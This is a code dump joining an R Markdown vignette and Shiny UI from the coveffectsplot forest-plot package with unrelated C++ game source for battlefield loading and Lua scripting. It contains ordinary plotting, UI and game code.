boxplotdat[paramname=="Cmax", paramname2 := "C[max]"]
boxplotdat[, covname2 := factor(covname2, levels=unique(covname2))]
#boxplotdat[, covvalue := factor(covvalue, levels=unique(covvalue))]
boxplotdat[, covvalue := factor(covvalue,
levels=c("56 kg", "72 kg", "40 g/L", "Male", "85 kg\nFemale\n45 g/L", "98 kg", "128 kg", "50 g/L"))]
pkparametersboxplot<- ggplot(boxplotdat, aes(x=covvalue, y=paramvalue))+
facet_grid(paramname2 ~ covname2, scales="free", labeller=label_parsed,
switch="both") +
geom_boxplot() +
labs(y="Parameter Values") +
theme(axis.title=element_blank(),
strip.placement = "outside")
pkparametersboxplot
```
```{r, fig.width=7 ,message=FALSE, include=FALSE}
# pkprofileuncertainty <- pkprofileuncertainty +theme_bw(base_size = 13)+
# theme(axis.title.y = element_text(size=15))+
# guides(colour=guide_legend(override.aes = list(alpha=1,size=0.5)),
# linetype=guide_legend(override.aes = list(size=0.5)))+
# coord_cartesian(ylim=c(0,4))
# pkprofileuncertainty
# ggsave("Figure_4_3.png", device="png",type="cairo-png",width= 7, height = 4,dpi=72)
#
# pkparametersboxplot
# ggsave("Figure_4_4.png", device="png",type="cairo-png",width= 7, height = 4,dpi=72)
#
# png("Figure_4_34.png", type="cairo-png",width= 2*7*72, height =5*72)
# egg::ggarrange(pkprofileuncertainty,pkparametersboxplot,nrow=1)
# dev.off()
```
### Alternative View of the Data: Distributions and Intervals
Here we provide an alternative visual summary of the standardized PK parameters. It shows the distribution, quantiles of interest. It isolates each covariate effects in one panel keeping the reference on its own. It is exactly the same data as the boxplots. Which visual presentation do you prefer? Which one enables you to clearly see and compare the covariate effects?
```{r, fig.width=7, fig.height=4 ,message=FALSE}
out.df.univariatecov.nca[covname=="WT", covname2 := "Weight"]
out.df.univariatecov.nca[covname=="ALB", covname2 := "Albumin"]
out.df.univariatecov.nca[covname=="SEX", covname2 := "Sex"]
out.df.univariatecov.nca[covname=="REF", covname2 := "Reference"]
out.df.univariatecov.nca[paramname=="AUC", paramname2 := "AUC"]
out.df.univariatecov.nca[paramname=="Clast", paramname2 := "C[last]"]
out.df.univariatecov.nca[paramname=="Cmax", paramname2 := "C[max]"]
out.df.univariatecov.nca[, covvalue := factor(covvalue, levels=unique(covvalue))]
out.df.univariatecov.nca[, covname2 := factor(covname2, levels=unique(covname2))]
out.df.univariatecov.nca[, paramname2 := factor(paramname2, levels=unique(paramname2))]
ggplot(out.df.univariatecov.nca, aes(
x = paramvaluestd,
y = covvalue,
fill = factor(..quantile..),
height = ..ndensity..)) +
facet_grid(covname2 ~ paramname2,
scales = "free_y",
space = "free",
labeller = label_parsed)+
annotate("rect",
xmin = 0.8,
xmax = 1.25,
ymin = -Inf,
ymax = Inf,
fill = "gray",
alpha = 0.4) +
stat_density_ridges(
geom = "density_ridges_gradient",
calc_ecdf = TRUE,
quantile_lines = TRUE,
rel_min_height = 0.001,
scale = 0.9,
quantiles = c(0.05,0.5, 0.95)) +
scale_x_continuous(
breaks = c(0.25, 0.5, 0.8, 1/0.8, 1/0.5, 1/0.25),
tran = "log") +
scale_fill_manual(
name = "Probability",
values = c("white", "#0000FFA0", "#0000FFA0", "white"),
labels = c("(0, 0.05]", "(0.05, 0.5]","(0.5, 0.95]", "(0.95, 1]")) +
geom_vline(aes(xintercept=1), size=1) +
theme_bw() +
labs(x="Effects Relative to Parameter Reference Value", y="")+
scale_x_continuous(breaks=c(0.25,0.5,0.8,1/0.8,1/0.5,1/0.25),trans ="log" )
```
```{r, fig.width=7 ,message=FALSE, include=FALSE}
# last_plot()+theme(legend.position="none")
# ggsave("Figure_4_5.png", device="png",type="cairo-png",
# width= 7, height = 4,dpi=72)
```
### Adding the BSV and Using `forest_plot`
To contrast the covariate effects with random unexplained variability we add to the data the BSV intervals computed in an earlier section. We then do some data manipulation and formatting to produce a plot from the package function `forest_plot`. To simplify we will only keep AUC before revisiting more than one parameter plots at the end.
```{r, fig.width=7, fig.height=6}
fpdata <- out.df.univariatecov.nca[,
setNames(as.list(quantile(paramvaluestd, probs=c(0.5, 0.05, 0.95))), c("mid", "lower", "upper")),
by=.(paramname2, covname2, covvalue)]
bsvranges[paramname=="AUC", paramname2 := "AUC"]
bsvranges[paramname=="Clast", paramname2 := "C[last]"]
bsvranges[paramname=="Cmax", paramname2 := "C[max]"]
setkey(bsvranges, paramname2)
fpdataBSV50 <- fpdata[covname2 == "Reference"]
fpdataBSV50$covname2 <- "BSV"
fpdataBSV50$covvalue <- "50% of patients"
setkey(fpdataBSV50, paramname2)
fpdataBSV50$lower <- bsvranges[,"P25"]
fpdataBSV50$upper <- bsvranges[,"P75"]
fpdataBSV90 <- fpdata[covname2 == "Reference"]
fpdataBSV90$covname2 <- "BSV"
fpdataBSV90$covvalue <- "90% of patients"
setkey(fpdataBSV90, paramname2)
fpdataBSV90$lower <- bsvranges[,"P05"]
fpdataBSV90$upper <- bsvranges[,"P95"]
fpdata <- rbind(fpdata, fpdataBSV90, fpdataBSV50)
fpdata[, LABEL := sprintf("%s [%s, %s]",
round_pad(mid, 2),
round_pad(lower, 2),
round_pad(upper, 2)) ]
setnames(fpdata, "paramname2", "paramname")
setnames(fpdata, "covname2", "covname")
setnames(fpdata, "covvalue", "label")
fpdata[, label := factor(label, levels=unique(label))]
interval_legend_text <- "Median (points)\n90% CI (horizontal lines)"
interval_bsv_text <- "BSV (points)\nPrediction Intervals (horizontal lines)"
ref_legend_text <- "Reference (vertical line)\nClinically relevant limits\n(gray area)"
area_legend_text <- "Reference (vertical line)\nClinically relevant limits\n(gray area)"
png("./Figure4_6.png",width =9 ,height = 6,units = "in",res=72)
coveffectsplot::forest_plot(fpdata[paramname=="AUC"],
ref_area = c(0.8, 1/0.8),
x_range = c(0.5, 2),
strip_placement = "inside",
base_size = 18,
y_label_text_size = 12,
xlabel = "Fold Change Relative to Reference",
ref_legend_text = ref_legend_text,
area_legend_text = area_legend_text,
interval_legend_text = interval_legend_text,
interval_bsv_text = interval_bsv_text,
facet_formula = "covname ~ paramname",
facet_switch = "y",
facet_scales = "free_y",
facet_space = "free",
paramname_shape = FALSE,
table_position = "right",
table_text_size = 4,
plot_table_ratio = 3,
show_table_facet_strip = "none",
logxscale = TRUE,
major_x_ticks = c(0.5, 0.8, 1/0.8, 1/0.5),
return_list = FALSE)
dev.off()
```

## Customization of the Plots
In this section, we first show a `forest_plot` built-in theme, then how you to get the ggplots as a list for further editing using ggplot code.
### Using `theme_benrich` along Additional Options
This is achieved by setting `theme_benrich = TRUE`, specifying that you want no legend
`legend_position = "none"`. With this theme active you can also control the `table_title` text and `table_title_size` arguments.
```{r,message=FALSE,fig.width=7}
png("./coveffectsplot4.png",width =9 ,height = 6,units = "in",res=72)
coveffectsplot::forest_plot(fpdata[paramname=="AUC"],
ref_area = c(0.8, 1/0.8),
x_range = c(0.5,2),
xlabel = "Fold Change Relative to Reference",
x_label_text_size= 10,
facet_formula = "covname~paramname",
theme_benrich = TRUE,
table_title_size = 15,
table_title = "Median [90% CI]",
interval_legend_text = interval_legend_text,
interval_bsv_text = interval_bsv_text,
legend_position = "none",
strip_placement = "outside",
base_size = 12,
facet_switch = "y",
facet_scales = "free_y",
facet_space = "free",
paramname_shape = FALSE,
table_position = "right",
table_text_size=4,
plot_table_ratio = 3,
show_table_facet_strip = "none",
logxscale = TRUE,
major_x_ticks = c(0.25,0.5,0.8,1/0.8,1/0.5,1/0.25),
return_list = FALSE)
dev.off()
```

### Returning a List of ggplots
You can get the underlying ggplots as a list for further editing by setting `return_list = TRUE` and saving it into an object. The list will contain two objects the first being the main plot and the second the table. We illustrate how you can modify the look of the plots using regular ggplot code that modify the facet text color to `gray` and italic. Finally we recombine the plots using `egg::ggarrange`.
```{r,message=FALSE,fig.width=7}
png("./coveffectsplot0.png",width =9 ,height = 6,units = "in",res=72)
plotlists <- coveffectsplot::forest_plot(fpdata[paramname=="AUC"],
ref_area = c(0.8, 1/0.8),
xlabel = "Fold Change Relative to Reference",
ref_legend_text = "Reference (vertical line)\nClinically relevant limits\n(gray area)",
area_legend_text = "Reference (vertical line)\nClinically relevant limits\n(gray area)",
interval_legend_text = interval_legend_text,
interval_bsv_text = interval_bsv_text,
facet_formula = "covname~paramname",
facet_switch = "y",
facet_scales = "free_y",
facet_space = "free",
paramname_shape = FALSE,
table_position = "right",
table_text_size=4,
plot_table_ratio = 4,
show_table_facet_strip = "none",
logxscale = TRUE,
major_x_ticks = c(0.25,0.5,0.8,1/0.8,1/0.5,1/0.25),
return_list = TRUE)
plotlists
dev.off()
```
```{r, fig.width=7, fig.height=6, warning=FALSE,message=FALSE}
main_plot <- plotlists[[1]] + theme(
panel.spacing=unit(10, "pt"),
panel.grid=element_blank(),
panel.grid.minor=element_blank(),
legend.position="bottom",
strip.placement.y="outside",
strip.background.y=element_blank(),
strip.text.y=element_text(
hjust=1,
vjust=1,
face="italic",color="gray",
size=rel(1)),
legend.text = element_text(size=rel(0.5)),
plot.margin = margin(t=0,r=0,b=0,l=5,unit="pt")) +
scale_y_discrete(
breaks=c("90% of patients",
"50% of patients",
"85 kg\nFemale\n45 g/L",
"40 g/L","50 g/L","Male",
"56 kg","72 kg","98 kg","128 kg"
),
labels=c("90% of patients",
"50% of patients",
"85 kg-Female-45 g/L",
"40 g/L","50 g/L","Male",
"56 kg","72 kg","98 kg","128 kg"
)
)
table_plot <- plotlists[[2]] + theme(
panel.border=element_blank(),
panel.spacing=unit(10, "pt"),
strip.background.y=element_blank(),
legend.text = element_text(size=rel(0.5)),
plot.margin = margin(t=0,r=5,b=0,l=0,unit="pt"))
png("./coveffectsplot5.png",width =8.5 ,height = 6,units = "in",res=72)
egg::ggarrange(
main_plot,
table_plot,
nrow = 1,
widths = c(3, 1)
)
dev.off()
```

### Launch the Shiny App for Point and Click Editing
Alternatively, you can launch the app by typing `run_interactiveforestplot(yourdataname)` for point and click editing. This will help you in quickly generating the plot you want.
```{r ,echo=FALSE}
# uncomment in interactive mode
# run_interactiveforestplot(coveffectsdatacovrepbsv)
```
## Plots with Multiple PK Parameters
You can also have plots with more than one PK parameter. You may want to facet by parameter, or to use different shape by parameter.
### Facet by Parameter
This is achieved by setting `paramname_shape = FALSE` and `facet_formula = "covname~paramname"`. We also suppress the table by using `table_position = "none"` and reduce the plot text sizes using `base_size = 11`.
```{r, fig.width=7, fig.height=6,message=FALSE}
png("./coveffectsplot6.png",width =9.5 ,height = 6,units = "in",res=72)
forest_plot(fpdata,
ref_area = c(0.8, 1/0.8),
x_range = c(0.5,2),
xlabel = "Fold Change Relative to Reference",
facet_formula = "covname~paramname",
interval_legend_text = interval_legend_text,
interval_bsv_text = interval_bsv_text,
facet_switch = "y",
facet_scales = "free_y",
facet_space = "free",
facet_labeller = label_parsed,
paramname_shape = FALSE,
table_position = "none",
table_text_size=4,
base_size = 11,
plot_table_ratio = 4,
show_table_facet_strip = "none",
logxscale = TRUE,
major_x_ticks = c(0.5,0.8,1/0.8,1/0.5),
x_label_text_size = 10,
return_list = FALSE)
dev.off()
```

### Shape by Parameter
This is achieved by setting `paramname_shape = TRUE` we also illustrate how you can use `legend_order` to choose the legend ordering and few other options.
```{r, fig.width=7, fig.height=6,message=FALSE}
png("./coveffectsplot7.png",width =9.5 ,height = 6,units = "in",res=72)
forest_plot(fpdata[paramname!="AUC"],
ref_area = c(0.8, 1/0.8),
x_range = c(0.35,1/0.35),
xlabel = "Fold Change Relative to Reference",
ref_legend_text = "Reference\nClinically relevant limits\n(0.8-1.25)",
area_legend_text = "Reference\nClinically relevant limits\n(0.8-1.25)",
interval_legend_text = "Median\n90% CI",
interval_bsv_text = "BSV\nPrediction Intervals",
facet_formula = "covname~.",
paramname_shape = TRUE,
legend_order =c("shape","pointinterval","ref", "area"),
legend_shape_reverse = TRUE,
bsv_col = scales::muted("red"),
interval_col = scales::muted("blue"),
facet_switch = "y",
facet_scales = "free_y",
facet_space = "free",
table_position = "none",
table_text_size=4,
base_size = 9,
plot_table_ratio = 4,
show_table_facet_strip = "none",
logxscale = TRUE,
major_x_ticks = c(0.5,0.8,1/0.8,1/0.5),
legend_space_x_mult = 0.01,
legend_position = "right",
return_list = FALSE)
dev.off()
```

We leave it up to the reader to edit the plot above to `parse` the labels of the shape legend to get subscripts.
While we covered varying one at a time covariate value (marginal effects), we can use observed or simulated distribution of correlated covariates and simulate joint covariate effects as illustrated in the PK Model in Pediatric Patients vignette.
<file_sep>/inst/shiny/ui.R
inline_ui <- function(tag) {
div(style = "display: inline-block", tag)
}
fluidPage(
useShinyjs(),
titlePanel(paste0("coveffectsplot: ",utils::packageVersion("coveffectsplot"))),
fluidRow(
column(
2,
tabsetPanel(
tabPanel(
"Inputs",
br(),
tags$div(
tags$strong("Choose csv file to upload"),
"or", actionLink("sample_data_btn", "use sample data")
),
fileInput("datafile", NULL,
multiple = FALSE, accept = c("csv")),
shinyjs::hidden(
selectizeInput(
'exposurevariables',
label = "Parameter(s)",
choices = c(),
multiple = TRUE,
options = list(plugins = list('remove_button', 'drag_drop')),
width = '800px'
),
checkboxInput('shapebyparamname', 'Change Symbol by Parameter(s) ?', value = TRUE),
sliderInput("vdodgeheight", "Vertical Space Between Parameters(s)",
min=0.5, max=2, value=0.8,width = '800px'),
selectizeInput(
"covariates",
"Covariates Top to Bottom (Remove/Drag and Drop to Desired Order):",
choices = c(),
multiple = TRUE,
options = list(
placeholder = 'Please select one or more variables',
plugins = list('remove_button', 'drag_drop')
),
width = '800px'
),
selectizeInput(
'covvalueorder',
label = paste("Drag and Drop to Desired Order within facets", "values"),
choices = c(),
multiple = TRUE,
options = list(plugins = list('remove_button', 'drag_drop')),
width = '800px'
)
)
), # tabPanel
tabPanel("Facets",
selectInput( "facetformula", "Facet Formula:",
choices = c("covname ~ .","covname~paramname"),
selected = c("covname ~ ."),
multiple = FALSE),
tabsetPanel(
tabPanel("Size/Angle/Face",
sliderInput("facettexty", "Facet Text Size Y",
min = 0, max = 32, step = 1, value = 22),
sliderInput("facettextx", "Facet Text Size X",
min = 0, max = 32, step = 1, value = 22),
sliderInput("facettextyangle", "Facet Text Angle Y",
min = 0, max = 180+90, step = 90, value = 0),
sliderInput("facettextxangle", "Facet Text Angle X",
min = 0, max = 90, step = 90, value = 0),
checkboxInput('boldfacettext', "Bold Facet Text", value = TRUE)
),
tabPanel("Justification",
sliderInput("x_facet_text_vjust", "Facet Text Vertical Justification X",
min = 0, max = 1, step = 0.1, value = 0.5),
sliderInput("y_facet_text_vjust", "Facet Text Vertical Justification Y",
min = 0, max = 1, step = 0.1, value = 0.5),
sliderInput("x_facet_text_hjust", "Facet Text Horizontal Justification X",
min = 0, max = 1, step = 0.1, value = 0.5),
sliderInput("y_facet_text_hjust", "Facet Text Horizontal Justification y",
min = 0, max = 1, step = 0.1, value = 0.5)
)
),
selectizeInput( "stripplacement", "Strip Placement:",
choices = c("inside","outside"),
selected = c("outside"),
options = list( maxItems = 1 ) ),
selectInput( "facetswitch", "Facet Switch to Near Axis:",
choices = c("both","y","x","none"),
selected = c("both"),
multiple = FALSE),
selectInput( "facetscales", "Facet Scales:",
choices = c("free_y","fixed","free_x","free"),
selected = c("free_y"),
multiple = FALSE),
selectInput('facetspace' ,'Facet Spaces:',
c("fixed","free_x","free_y","free") )
),
tabPanel(
"X/Y Axes",
sliderInput("ylablesize", "Y axis labels size", min=1, max=32, value=24,step=0.5),
sliderInput("xlablesize", "X axis labels size", min=1, max=32, value=24,step=0.5),
checkboxInput('showyaxisgridlines', "Keep Y axis Gridlines", value = TRUE),
checkboxInput('showxaxisgridlines', "Keep X axis Gridlines", value = TRUE),
checkboxInput('customxticks', 'Custom X axis Ticks ?', value = FALSE),
conditionalPanel(
condition = "input.customxticks" ,
textInput("xaxisbreaks",label ="X axis major Breaks",
value = as.character(paste(
0,0.25,0.5,0.8,1,1.25,1.5,1.75,2
,sep=",") )
),
textInput("xaxisminorbreaks",label ="X axis minor Breaks",
value = as.character(paste(
0.75,1.333
,sep=",") )
),
hr()
),
checkboxInput('userxzoom', 'Custom X axis Range ?', value = FALSE),
conditionalPanel(
condition = "input.userxzoom" ,
numericInput("lowerxin",label = "Lower X Limit",value = 0.01,min=NA,max=NA,width='100%'),
numericInput("upperxin",label = "Upper X Limit",value = 2,min=NA,max=NA,width='100%')
),
checkboxInput('logxscale', 'Log-scale X axis ?', value = FALSE),
textInput("yaxistitle", label = "Y axis Title", value = ""),
checkboxInput('parseyaxistitle', 'Parse Y axis Title?', value = FALSE),
textInput("xaxistitle", label = "X axis Title", value = ""),
checkboxInput('parsexaxistitle', 'Parse X axis Title?', value = FALSE)
),
tabPanel(
"How To",
hr(),
includeMarkdown(file.path("text", "howto.md"))
) # tabpanel
) # tabsetPanel
), # column3
column(
8,
plotOutput('plot', height = "auto", width = "100%"),
shinyjs::hidden(
actionButton("get_code", "Show Code", icon = icon("code")), br(), br()
)
), # column6
column(
2,
tabsetPanel(
tabPanel(
"Table Options",
numericInput("sigdigits",label = "Significant Digits",value = 2,min=0,max=NA),
sliderInput("tabletextsize", "Table Text Size", min=1, max=12,step=0.5, value=7),
sliderInput("plottotableratio", "Plot to Table Ratio", min=1, max=5,
value=4,step=0.25,
animate = FALSE),
selectInput('tableposition','Table Position:',
c("on the right" = "right", "below" = "below", "none" = "none") ),
selectInput( "showtablefacetstrips", "Show Table Facet Strip on:",
choices = c("none","both","y","x"),
selected = c("none"),
multiple = FALSE),
selectInput( "tablefacetswitch", "Table Facet Switch to Near Axis:",
choices = c("both","y","x","none"),
selected = c("both"),
multiple = FALSE),
checkboxInput('showtableyaxisticklabel',
'Show Table y axis ticks/labels ?', value = FALSE),
checkboxInput('reservetablexaxislabelspace', 'Reserve Table x axis space ?',
value = FALSE),
checkboxInput('tablepanelborder',
'Draw Table Panel Borders ?',
value = TRUE)
),#tabpanel
tabPanel(
"Reference Options",
checkboxInput('showrefvalue', 'Show Reference Line?', value = TRUE),
conditionalPanel(condition = "input.showrefvalue" ,
numericInput("refvalue","Reference Line",value = 1,step = 0.1)),
checkboxInput('showrefarea', 'Show Reference Area?', value = TRUE),
conditionalPanel(condition = "input.showrefarea" ,
uiOutput("refarea")),
colourpicker::colourInput("fillrefarea",
"Reference Area Fill:",
value= "#BEBEBE50",
showColour = "both",allowTransparent=TRUE,
returnName = TRUE),
div( actionButton("fillrefareareset", "Reset Reference Area Fill"),
style="text-align: right"),
colourpicker::colourInput("colorrefvalue",
"Reference Line Color:",
value= "black",
showColour = "both",allowTransparent=TRUE,
returnName = TRUE),
div( actionButton("colorrefvaluereset", "Reset Reference Line Color"),
style="text-align: right")
),#tabpanel
tabPanel(
"Colour/Legend Options/Theme",
colourpicker::colourInput("stripbackgroundfill",
"Strip Background Fill:",
value="#E5E5E5",
showColour = "both",allowTransparent=TRUE, returnName = TRUE),
div( actionButton("stripbackfillreset", "Reset Strip Background Fill"),
style="text-align: right"),
checkboxInput('removestrip', "Show Strip Background",value = TRUE),
colourpicker::colourInput("colourpointrange",
"Point Range Colour:",
value="blue",
showColour = "both",allowTransparent=TRUE, returnName = TRUE),
div( actionButton("colourpointrangereset", "Reset Point Range Colour"),
style="text-align: right"),
colourpicker::colourInput("colourbsvrange",
"BSV Range Colour:",
value="red",
showColour = "both",allowTransparent=TRUE, returnName = TRUE),
div( actionButton("colourbsvrangereset", "Reset BSV Range Colour"),
style="text-align: right"),
sliderInput("base_size", "Base size for the theme",
min = 1, max = 30, step = 0.1, value = 22),
sliderInput("height", "Plot Height", min=1080/4, max=1080,
value=900, animate = FALSE),
checkboxInput('theme_benrich', "Apply Ben's Theme",value = FALSE),
conditionalPanel(
condition = "input.theme_benrich",
textInput("custom_table_title", label ="Table Title",
value="Median [95% CI]"),
sliderInput("table_title_size", "Size for Table Title",
min = 1, max = 30, step = 0.1, value = 15)
) ,
selectizeInput(
'legendposition',
label = "Legend Position",
choices = c("top","bottom","right","none"),
selected = c("top"),
multiple=FALSE)
),#tabpanel
tabPanel(
"Custom Legend Ordering/Spacing",
inline_ui(
numericInput("ncolinterval",label = "Number of columns for the Interval legend",
value = 1,min=NA,max=NA,width='120px')),
inline_ui(
numericInput("ncolshape",label = "Number of columns for the shape legend",
value = 1,min=NA,max=NA,width='120px')),
selectizeInput(
'legendordering',
label = paste("Drag/Drop to reorder","Colour, Ref, Area Legends"),
choices = c("pointinterval","ref","area","shape"),
selected = c("pointinterval","ref","area","shape"),
multiple=TRUE, options = list(
plugins = list('drag_drop')
)),
checkboxInput('legendshapereverse',
'Reverse the order of shape legend items ?',value = TRUE),
sliderInput("legendspacex", "Multiplier for Space between Legends",
min = 0, max = 1.5, step = 0.1, value = 1),
numericInput("panelspacing",label = "Strip Panel Spacing",
value = 5.5,min=0,step=0.1,
max=20,width='100%'),
inline_ui(
numericInput("margintop",label = "Plot Top Margin",
value = 0,min=0,max=NA,width='80px')),
inline_ui(
numericInput("tabletop",label = "Table Top Margin",
value = 0,min=0,max=NA,width='80px')),
inline_ui(
numericInput("legendtop",label = "Legend Top Margin",
value = 0,min=0,max=NA,width='80px')),
inline_ui(
numericInput("marginleft",label = "Plot Left Margin",
value = 5.5,min=0,max=NA,width='80px')),
inline_ui(
numericInput("tableleft",label = "Table Left Margin",
value = 5.5,min=0,max=NA,width='80px')),
inline_ui(
numericInput("legendleft",label = "Legend Left Margin",
value = 5.5,min=0,max=NA,width='80px')),
inline_ui(
numericInput("marginright",label = "Plot Right Margin",
value = 5.5,min=0,max=NA,width='80px')),
inline_ui(
numericInput("tableright",label = "Table Right Margin",
value = 5.5,min=0,max=NA,width='80px')),
inline_ui(
numericInput("legendright",label = "Legend Right Margin",
value = 5.5,min=0,max=NA,width='80px')),
inline_ui(
numericInput("marginbottom",label = "Plot Bottom Margin",
value = 0,min=0,max=NA,width='80px')),
inline_ui(
numericInput("tablebottom",label = "Table Bottom Margin",
value = 0,min=0,max=NA,width='80px')),
inline_ui(
numericInput("legendbottom",label = "Legend Bottom Margin",
value = 0,min=0,max=NA,width='80px'))
),#tabpanel
tabPanel(
"Custom Legend Text",
textInput("customcolourtitle", label ="Pointinterval Legend text",
value="Median (points)\\n95% CI (horizontal lines)"),
textInput("custombsvtitle", label ="BSV Legend text",
value="BSV (points)\\nPrediction Intervals (horizontal lines)"),
textInput("customlinetypetitle", label ="Ref Legend text",
value="Reference (vertical line)\\nClinically relevant limits (colored area)"),
textInput("customfilltitle", label ="Area Legend text",
value="Reference (vertical line)\\nClinically relevant limits (colored area)"),
checkboxInput('combineareareflegend',
'Combine Ref and Area Legends if they share the same text ?',value = TRUE)
)#tabpanel
) # tabsetpanel
) # closes the column 3
)# fluidrow
)#fluidpage
|
28b9fa418414a76f171cfb51896141730834df78
|
[
"Markdown",
"R",
"RMarkdown"
] | 17
|
Markdown
|
smouksassi/interactiveforestplot
|
3a67629d13d29a16ad94f94cacacae5bfada7eef
|
4346dcde123cd4599c0baa6ccd07ca89a3b29e07
|
refs/heads/master
|
<file_sep>#ifndef BATTLEFIELD_PROVIDER_H
#define BATTLEFIELD_PROVIDER_H
#include <map>
#include <unordered_map>
#include <vector>
#include "CommonDefinitions.h"
#include "tinyxml2.h"
class BattleField;
class BattleFieldFactory;
class MegamanData;
/* Persistent object that provides an appropriate battlefield map each time it is called */
class BattlefieldProvider {
public:
BattlefieldProvider(std::string standardBackground, std::string standardMusic);
bool initializeMaps(const std::string& mapsFilename);
BattleField* getBattlefield(Area area, MegamanData* data, int minimalTier = 0);
private:
std::string previousID;
tinyxml2::XMLDocument mapDocument;
tinyxml2::XMLNode* mapRoot;
std::string standardBackground;
std::string standardMusic;
tinyxml2::XMLElement* chooseBattlefield(Area area, int minimalTier) const;
int gatherTotalWeightOfMaps(tinyxml2::XMLElement* map, int minimalTier) const;
tinyxml2::XMLElement* findArea(Area area) const;
BattleField* parseBattlefield(tinyxml2::XMLElement* map);
void parseRow(tinyxml2::XMLElement* row, RowPosition rowPosition, BattleFieldFactory& factory) const;
void placeObjectsOnBattlefield(BattleField* battlefield, MegamanData* data, tinyxml2::XMLElement* objectNode) const;
};
#endif<file_sep>#ifndef SCRIPT_INTERFACE_H
#define SCRIPT_INTERFACE_H
#include <iostream>
#include <string>
#include "luaHeader.h"
/* Maintains a lua state which contains tables with parameters */
class ScriptInterface {
public:
ScriptInterface();
bool addScript(const std::string& scriptName);
void update();
template<class T>
T retrieveParameter(const std::string& tableName, const std::string& entryName, const std::string& parameter);
private:
lua_State* state;
std::vector<std::string> scriptNames;
luabind::object retrieveObject(const std::string& tableName, const std::string& entryName, const std::string& parameter);
};
template<class T>
T ScriptInterface::retrieveParameter(const std::string& tableName, const std::string& entryName, const std::string& parameter) {
return luabind::object_cast<T>(retrieveObject(tableName, entryName, parameter));
}
#endif
<file_sep>#include "ScriptInterface.h"
#include "cocos2d.h"
ScriptInterface::ScriptInterface() {
state = luaL_newstate();
}
bool ScriptInterface::addScript(const std::string& scriptName) {
if (luaL_dofile(state, scriptName.c_str()) == 0) {
scriptNames.push_back(scriptName);
return true;
}
std::string errorMessage = "Script with filename " + scriptName + " is not a valid lua file or does not exist\n";
cocos2d::log(errorMessage.c_str());
return false;
}
void ScriptInterface::update() {
for (const auto& script : scriptNames) {
luaL_dofile(state, script.c_str());
}
}
luabind::object ScriptInterface::retrieveObject(const std::string& tableName, const std::string& entryName, const std::string& parameter) {
luabind::object table = luabind::globals(state)[tableName];
if (luabind::type(table) == LUA_TTABLE) {
luabind::object entry = table[entryName];
if (luabind::type(entry) == LUA_TTABLE) {
return entry[parameter];
}
}
std::string errorMessage = "Failed to retrieve parameter from script";
errorMessage += ", tablename: " + tableName + ", entryname : " + entryName + ", parameter : " + parameter + "\n";
cocos2d::log(errorMessage.c_str());
return luabind::object();
}
<file_sep>#include "BattlefieldProvider.h"
#include "BattleField.h"
#include "BattleTile.h"
#include "Actor.h"
#include "Megaman.h"
#include <fstream>
#include <sstream>
#include <iostream>
#include <string>
#include <exception>
#include <stdexcept>
using namespace tinyxml2;
using namespace cocos2d;
inline static bool isGoodTier(XMLElement* map, int minimalTier) {
int tier;
return (map && map->QueryAttribute("tier", &tier) == XML_SUCCESS && tier >= minimalTier);
}
BattlefieldProvider::BattlefieldProvider(std::string _standardBackground, std::string _standardMusic)
: previousID(""), standardBackground(_standardBackground), standardMusic(_standardMusic), mapRoot(nullptr) {
}
bool BattlefieldProvider::initializeMaps(const std::string& mapsFilename) {
FileUtils* fileUtils = FileUtils::getInstance();
std::string filename = fileUtils->fullPathForFilename(mapsFilename);
XMLError error = mapDocument.LoadFile(filename.c_str());
if (error != XML_SUCCESS) {
cocos2d::log("Failed to load map document\n");
return false;
}
mapRoot = mapDocument.FirstChildElement("maps");
return (mapRoot != nullptr);
}
BattleField* BattlefieldProvider::getBattlefield(Area area, MegamanData* data, int minimalTier) {
if (!mapRoot) {
return nullptr; //No map data is available.
}
BattleField* battlefield = nullptr;
XMLElement* map = chooseBattlefield(area, minimalTier);
if (map) {
battlefield = parseBattlefield(map);
battlefield->setArea(area);
XMLElement* objectNode = map->FirstChildElement("objects");
placeObjectsOnBattlefield(battlefield, data, objectNode);
}
return battlefield;
}
tinyxml2::XMLElement* BattlefieldProvider::chooseBattlefield(Area area, int minimalTier) const {
XMLElement* areaContainer = findArea(area);
XMLElement* map = areaContainer->FirstChildElement("map");
int totalWeight = gatherTotalWeightOfMaps(map, minimalTier);
//Choose the first valid map in the area, if none exist then nullptr is returned.
//This is desired because an effect might be active that prevents weak/easy battles.
XMLElement* chosenMap = areaContainer->FirstChildElement("map");
while (chosenMap && !isGoodTier(chosenMap, minimalTier))
chosenMap = chosenMap->NextSiblingElement("map");
if (!chosenMap)
return nullptr;
//Pick a random valid map.
int random = cocos2d::RandomHelper::random_int(0, totalWeight);
random -= chosenMap->IntAttribute("weight");
map = chosenMap->NextSiblingElement("map");
while (map && random >= 0) {
if (isGoodTier(map, minimalTier)) {
random -= map->IntAttribute("weight");
if (random < 0) {
chosenMap = map;
}
}
map = map->NextSiblingElement("map");
}
return chosenMap;
}
int BattlefieldProvider::gatherTotalWeightOfMaps(XMLElement* map, int minimalTier) const {
int totalWeight = 0;
while (map) {
if (isGoodTier(map, minimalTier)) {
totalWeight += map->IntAttribute("weight");
map = map->NextSiblingElement("map");
}
}
return totalWeight;
}
tinyxml2::XMLElement* BattlefieldProvider::findArea(Area area) const {
std::string areaString = toString(area);
XMLElement* areaContainer = mapRoot->FirstChildElement("area");
while (areaContainer && areaContainer->Attribute("name") != areaString) {
areaContainer = areaContainer->NextSiblingElement("area");
}
if (!areaContainer) {
if (area == Area::GENERAL) {
throw(std::runtime_error("General area not found in maps file"));
}
std::string errorMessage = "Area not found in maps file: " + toString(area) + "\n";
cocos2d::log(errorMessage.c_str());
//If no maps are available for the desired area, we pick a general map instead.
areaContainer = findArea(Area::GENERAL);
}
return areaContainer;
}
BattleField* BattlefieldProvider::parseBattlefield(tinyxml2::XMLElement* map) {
if (!map)
return nullptr;
const char* id = map->Attribute("id");
if (!id)
throw(std::runtime_error("Map doesn't have an ID"));
previousID = id;
BattleFieldFactory battleFieldFactory;
XMLElement* tiles = map->FirstChildElement("tiles");
if (!tiles) {
std::string errorMessage = "Map doesn't have tiles section: " + previousID;
throw(std::runtime_error(errorMessage.c_str()));
}
//Parse all 3 rows of the battlefield.
XMLElement* row = tiles->FirstChildElement("frontRow");
if (row)
parseRow(row, RowPosition::FRONT, battleFieldFactory);
row = tiles->FirstChildElement("middleRow");
if (row)
parseRow(row, RowPosition::MID, battleFieldFactory);
row = tiles->FirstChildElement("backRow");
if (row)
parseRow(row, RowPosition::BACK, battleFieldFactory);
BattleField* battlefield = battleFieldFactory.getBattleField();
if (!battlefield) {
